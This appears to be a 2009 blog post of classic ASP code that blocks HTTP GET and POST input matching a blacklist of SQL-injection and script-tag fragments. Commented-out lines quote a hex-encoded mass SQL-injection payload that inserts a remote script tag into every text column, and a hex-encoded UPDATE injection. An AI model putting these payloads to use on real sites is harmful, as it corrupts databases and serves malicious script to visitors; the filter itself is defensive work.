Tuesday, January 6, 2009

detect Filter All HTTP GET and POST data using a black list

Filter All HTTP GET and POST data using a black list



<%
'str = "0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
'str = "0x3B7570646174652063776E5F6D656D62657220736574206E616D653D2767616E272077686572652069643D"
'str = trim0x( str )
'
'Response.Write decimalToChar( str )
'
'Response.Write "
====
"

'Response.Write Request.QueryString() & "
"
'Response.Write "====
"
'

'Response.Write Request.ServerVariables("QUERY_STRING") & "<br>=====
"



strBlackList = Array( ";declare", "; declare", ";%20declare", _
";set", "; set", ";%20set", _
";exec", "; exec", ";%20exec", _
"%20set", _
"varchar", _
"0x44", _
"<script", _
"%3Cscript", _
"3C736372697074", _
"</script>", _
"%3C/script", _
"src=" _
)

For b = 0 To UBound(strBlackList) Step 1
' ### Note: Instead of parsing the string using Request.QueryString, get the whole query string usin g Request.Servervariables("QUERY_STRING") because the a request in the following format will not be parsed:
' ### <form method="post" action="post.asp?PageID=123;Declare @a;Set @=123;Exec(@);">
' ### </form>
For Each item In Request.QueryString()
queryStr = Request.QueryString(item)
If InStr(1, queryStr, strBlackList(b), 1) > 0 Then
Response.Write "NO!!"
Response.End
End If
'Execute( "my_" & item & " = """ & replace( Request.QueryString(item), "'", "''") & """" )
Next

For Each item In Request.Form()
formStr = Request.Form(item)
If InStr(1, formStr, strBlackList(b), 1) > 0 Then
Response.Write "NO!!"
Response.End
End If
'Execute( "my_" & item & " = """ & replace( Request.Form(item), "'", "''") & """" )
Next
Next



Function URLDecode(str)
str = Replace(str, "+", " ")
For i = 1 To Len(str)
sT = Mid(str, i, 1)
If sT = "%" Then
If i+2 < Len(str) Then
sR = sR & _
Chr(CLng("&H" & Mid(str, i+1, 2)))
i = i+2
End If
Else
sR = sR & sT
End If
Next
URLDecode = sR
End Function


Function charToHex( str )
strResult = ""
leng = len(str)
For i = 1 To leng Step 1
strResult = strResult & hex( asc( mid( str, i, 1) ) )
Next
charToHex = strResult
End Function

Function charToDecimal( str )
strResult = ""
leng = len(str)
For i = 1 To leng Step 1
strResult = strResult & asc( mid( str, i, 1) )
Next
charToDecimal = strResult
end Function

Function trim0x(str)
strTmp = mid(str, 1, 2)
if strTmp = "0x" or strTmp = "0X" then
str = mid( str, 3)
end if
trim0x = str
End Function



Function decimalToChar( strDec )
strResult = ""
count = -1
leng = len(strDec)/2
For i = 1 To leng Step 1
count = count + 2
strResult = strResult & Chr( hexToDecimal( Mid( strDec, count, 2 ) ) )
next
decimalToChar = strResult
End Function

Function hexToDecimal(strHex)
dim lngResult
dim intIndex
dim strDigit
dim intDigit
dim intValue

lngResult = 0
for intIndex = len(strHex) to 1 step -1
strDigit = mid(strHex, intIndex, 1)
intDigit = instr("0123456789ABCDEF", ucase(strDigit))-1
if intDigit >= 0 then
intValue = intDigit * (16 ^ (len(strHex)-intIndex))
lngResult = lngResult + intValue
else
lngResult = 0
intIndex = 0 ' stop the loop
end if
next

hexToDecimal = lngResult
End Function
%>

No comments: